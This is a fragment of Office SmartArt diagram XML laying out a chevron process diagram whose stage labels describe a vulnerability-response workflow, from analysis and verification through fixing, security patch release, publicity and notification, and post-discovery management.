    <dgm:cxn modelId="{62ACC43D-4D66-4B90-A031-C0FA7B543ED2}" type="presParOf" srcId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" destId="{EA93596E-FEC6-4038-888C-66088660B02D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C69B389A-D027-4B18-B9D0-BA86CC99F98F}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6612910F-9FE7-4FB0-8F1A-73C61255F76D}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{50209067-CD63-48B2-8845-7E70BB001747}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{23848E1E-0979-4F0C-8826-458B872EDC50}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{492CCC05-6E8B-422C-970B-7598FB70BDD3}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{3C5F23ED-AA36-464D-9A6F-A6690E507040}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4B131C88-8E08-4E62-A6A6-F5019450F739}" type="presParOf" srcId="{3C5F23ED-AA36-464D-9A6F-A6690E507040}" destId="{713C9015-6F20-456F-AFD7-EF5EDDC7BB75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{45526102-74DE-40BD-8765-1D2B337EAE2A}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{E257FE17-05B6-4AD4-954B-2A7582F150FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6AF64BC1-F310-4353-A6FD-D0B62E134830}" type="presParOf" srcId="{E257FE17-05B6-4AD4-954B-2A7582F150FB}" destId="{4D2EEDFA-04C0-48F4-B658-670B00005E2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{D59B3131-24FB-46F2-9E33-B3A97E06DFFF}" type="presParOf" srcId="{E257FE17-05B6-4AD4-954B-2A7582F150FB}" destId="{AB5C9B9A-26F7-464A-B2A4-B8FCDAF8DD33}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{77D41D07-5429-4E0D-9ABD-AFBDFA79390D}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{7F58302C-D8DF-446D-8B8D-88EDFDFCFDF9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{014B6EA4-E7AF-418D-854F-BB94F4AFDFE5}" type="presParOf" srcId="{7F58302C-D8DF-446D-8B8D-88EDFDFCFDF9}" destId="{5E8849A6-91FA-4BD4-99CD-9C55BAF307F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{BFA9B3BC-947D-4118-8A81-37564FE51605}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{3441CC00-B5C1-4CB0-83F3-0A0730D26435}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C956994D-19DB-4701-9888-0CBD28009D0D}" type="presParOf" srcId="{3441CC00-B5C1-4CB0-83F3-0A0730D26435}" destId="{DA0D96BB-B642-42EB-80EF-D6B63A6C3235}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{FC514801-9FC1-44E8-B31D-03DEB3A689FD}" type="presParOf" srcId="{3441CC00-B5C1-4CB0-83F3-0A0730D26435}" destId="{C3D6A540-FBC5-4A08-B16B-CD7B5BB1C840}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0EDAAF68-417A-47E6-ABAC-05E254839F03}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{5DF7F94C-15CC-444B-BBC4-3BC3DE82C086}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5E8C618A-6321-4918-AAF9-F5CFE7812234}" type="presParOf" srcId="{5DF7F94C-15CC-444B-BBC4-3BC3DE82C086}" destId="{458872A9-D5CB-4670-A8BD-92771E471904}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C1388D48-0993-4934-9226-FBE450783246}" type="presParOf" srcId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" destId="{FD0FD14F-9171-4F7A-AD96-9AF882D973AF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{04F87CBC-33CF-4F84-952A-1FBA35DC6335}" type="presParOf" srcId="{FD0FD14F-9171-4F7A-AD96-9AF882D973AF}" destId="{ACE4F60C-9D42-4E10-8D50-7E110D2E1C2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{AE8419E2-71FB-4CF1-8025-A8A4E35CC82D}" type="presParOf" srcId="{FD0FD14F-9171-4F7A-AD96-9AF882D973AF}" destId="{52719DAE-8830-432C-96B3-A35FA9437866}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B6BB4C55-ED6F-4C2F-962E-CEF27E3629B0}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DE69D185-8F6E-4B55-909E-9ADAA36FB3E8}" type="presParOf" srcId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" destId="{F068C259-059C-4CC5-8652-F5B665FB5718}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CFD4B72C-0C5F-4F92-AB9C-8BBA2EA7F07C}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{1C2E27ED-3C37-431C-AA51-9A484E3ED265}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{26DAF7A5-A326-4F4C-B655-165A1496E014}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{901A351A-B090-4270-802D-8B914DB9A801}" type="presParOf" srcId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" destId="{BF9D6DFE-67EF-4C52-8A57-414AA73D9276}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{48AC5E92-7A01-497C-8D8F-F25E3BEAF102}" type="presParOf" srcId="{BF9D6DFE-67EF-4C52-8A57-414AA73D9276}" destId="{6EB4C6DB-3B4B-4DAF-A4A6-6B5764C453D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7F47FC1C-A0AC-4890-8B06-9AAEEF1B766A}" type="presParOf" srcId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" destId="{96E451D5-E37F-493A-B96B-B557A32A3AB3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7DCF020C-FE95-4480-A605-D0481248E83B}" type="presParOf" srcId="{96E451D5-E37F-493A-B96B-B557A32A3AB3}" destId="{7C08C730-988A-41AA-AC4B-9AC1651F017F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{26619319-B7B5-4516-866C-AC90E5A97551}" type="presParOf" srcId="{96E451D5-E37F-493A-B96B-B557A32A3AB3}" destId="{EA15C350-2190-4927-9A97-A0D9F74EC451}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{D77AEC10-CA1E-4264-8B61-459C226A3D35}" type="presParOf" srcId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" destId="{625375CF-4568-4416-947D-B1F3149B538E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E8F12CE4-C4C4-45B4-B47C-467A67D00F67}" type="presParOf" srcId="{625375CF-4568-4416-947D-B1F3149B538E}" destId="{98815C70-5A48-4976-A628-031856C20494}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3A04862B-4DA3-4331-9D5C-0B9B043C583D}" type="presParOf" srcId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" destId="{498464C5-F5DE-4763-8A7E-DA0EEDB992D2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{25DD9CE8-509C-406D-A2E9-6DD803F2732A}" type="presParOf" srcId="{498464C5-F5DE-4763-8A7E-DA0EEDB992D2}" destId="{2C5B2CE4-B3C5-4EE6-ABD2-5F3C6A5B337A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EE71A281-5121-442A-BF0A-95F61DE86624}" type="presParOf" srcId="{498464C5-F5DE-4763-8A7E-DA0EEDB992D2}" destId="{9C716BD6-9CDD-47F2-90A7-596180770D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7F138A-2C4D-489A-8051-DAD46185B556}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7B29033-8268-4A93-AFFD-3CDF696721C2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254F7C99-6FD4-481D-843F-C67E3896017C}" type="parTrans" cxnId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}" type="sibTrans" cxnId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1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380FD181-0F3F-4345-AC37-4C800CFA0FDD}" type="parTrans" cxnId="{A728F582-F840-4EF2-8BA6-5CC8F7264F79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E034025D-255E-4A69-8A85-BF060A84B9E4}" type="sibTrans" cxnId="{A728F582-F840-4EF2-8BA6-5CC8F7264F79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fixing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B234C0A-2179-4090-A4FF-AC47E95CE88C}" type="parTrans" cxnId="{6DA43E1A-B73C-44F2-857F-5C918D0D8763}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30647162-8D0D-4A54-937B-9BC16E1E676A}" type="sibTrans" cxnId="{6DA43E1A-B73C-44F2-857F-5C918D0D8763}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Analysis and Verification</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{383B401F-3F6C-4F14-BF2D-A30B6E60498B}" type="parTrans" cxnId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}" type="sibTrans" cxnId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02CD7472-5053-4479-B93D-AFEAC33845B8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Security Patch Release</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84E70964-A4CE-4854-B248-2208779DA0BB}" type="parTrans" cxnId="{3F064558-BB8E-46F6-A8F4-5DCF647A6185}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DE87F07-A18E-4842-8BE1-6818381D27DB}" type="sibTrans" cxnId="{3F064558-BB8E-46F6-A8F4-5DCF647A6185}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Publicity and Notification</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4CAA07E-7AAD-4D39-95A6-8551CFEEAAC4}" type="parTrans" cxnId="{66C245F3-7FAA-4CEE-A252-B2D36DF31581}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86B6F120-68B6-47B2-BFA0-310A11577EF5}" type="sibTrans" cxnId="{66C245F3-7FAA-4CEE-A252-B2D36DF31581}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Post-Discovery Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{120A541B-D76D-4393-9D07-CF0DB3197D4C}" type="parTrans" cxnId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A239001F-66D7-42C8-B84A-056F2F7FE4E5}" type="sibTrans" cxnId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" type="pres">
      <dgm:prSet presAssocID="{777F138A-2C4D-489A-8051-DAD46185B556}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E061137-81B2-4ECE-AB25-522714A6B5C0}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="bgChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA41862D-8759-499E-BE04-DD513795BC59}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82A84D0B-04AC-4DCD-8A5F-5B1A4728DD8D}" type="pres">
      <dgm:prSet presAssocID="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="bgChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDDC9E00-19C7-4546-B627-C59745F626D3}" type="pres">
      <dgm:prSet presAssocID="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" type="pres">
      <dgm:prSet presAssocID="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CC709BE-1E60-493D-8CA9-144586666C58}" type="pres">
      <dgm:prSet presAssocID="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1}" presName="bgChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48931127-ABD4-4DD2-B984-08D0D8CD79F5}" type="pres">
      <dgm:prSet presAssocID="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCB81395-D76A-4474-BDCE-1B43B75CFBFB}" type="pres">
      <dgm:prSet presAssocID="{E034025D-255E-4A69-8A85-BF060A84B9E4}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEE02288-FAD6-4366-965F-58F7404B784A}" type="pres">
      <dgm:prSet presAssocID="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F92447D1-0983-437A-961F-5D47637340EB}" type="pres">
      <dgm:prSet presAssocID="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}" presName="bgChev" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4C8E0A9-44B0-448F-BA09-3D3A3CD37C08}" type="pres">
      <dgm:prSet presAssocID="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{756A3D41-D02A-44B0-B2D3-28E34F0BFEBE}" type="pres">
      <dgm:prSet presAssocID="{30647162-8D0D-4A54-937B-9BC16E1E676A}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" type="pres">
      <dgm:prSet presAssocID="{02CD7472-5053-4479-B93D-AFEAC33845B8}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33A651F8-FC14-4BFE-9C72-CEF93A74B212}" type="pres">
      <dgm:prSet presAssocID="{02CD7472-5053-4479-B93D-AFEAC33845B8}" presName="bgChev" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC571F17-C613-4440-9AE3-3B7CC47777EC}" type="pres">
      <dgm:prSet presAssocID="{02CD7472-5053-4479-B93D-AFEAC33845B8}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0890D238-B059-476C-A188-8FE751F4DA15}" type="pres">
      <dgm:prSet presAssocID="{1DE87F07-A18E-4842-8BE1-6818381D27DB}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88517F13-670A-4045-9B23-5DC9D030E71E}" type="pres">
      <dgm:prSet presAssocID="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77AAD59D-F5F8-439E-A30A-A77EE86298AC}" type="pres">
      <dgm:prSet presAssocID="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}" presName="bgChev" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77A69956-0F53-4D30-BEBA-9AEC5EF69A3B}" type="pres">
      <dgm:prSet presAssocID="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E677F193-F20D-4735-970A-C68AA425323C}" type="pres">
      <dgm:prSet presAssocID="{86B6F120-68B6-47B2-BFA0-310A11577EF5}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" presName="bgChev" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8D87454-8007-4B52-B763-2E00EBDEE85D}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{5A0DA203-DCB2-4EF1-A902-69939A7BFBD6}" type="presOf" srcId="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}" destId="{77A69956-0F53-4D30-BEBA-9AEC5EF69A3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{65260804-2217-4EF0-A336-5D5AD0C8F458}" type="presOf" srcId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" destId="{D8D87454-8007-4B52-B763-2E00EBDEE85D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{6DA43E1A-B73C-44F2-857F-5C918D0D8763}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}" srcOrd="3" destOrd="0" parTransId="{2B234C0A-2179-4090-A4FF-AC47E95CE88C}" sibTransId="{30647162-8D0D-4A54-937B-9BC16E1E676A}"/>
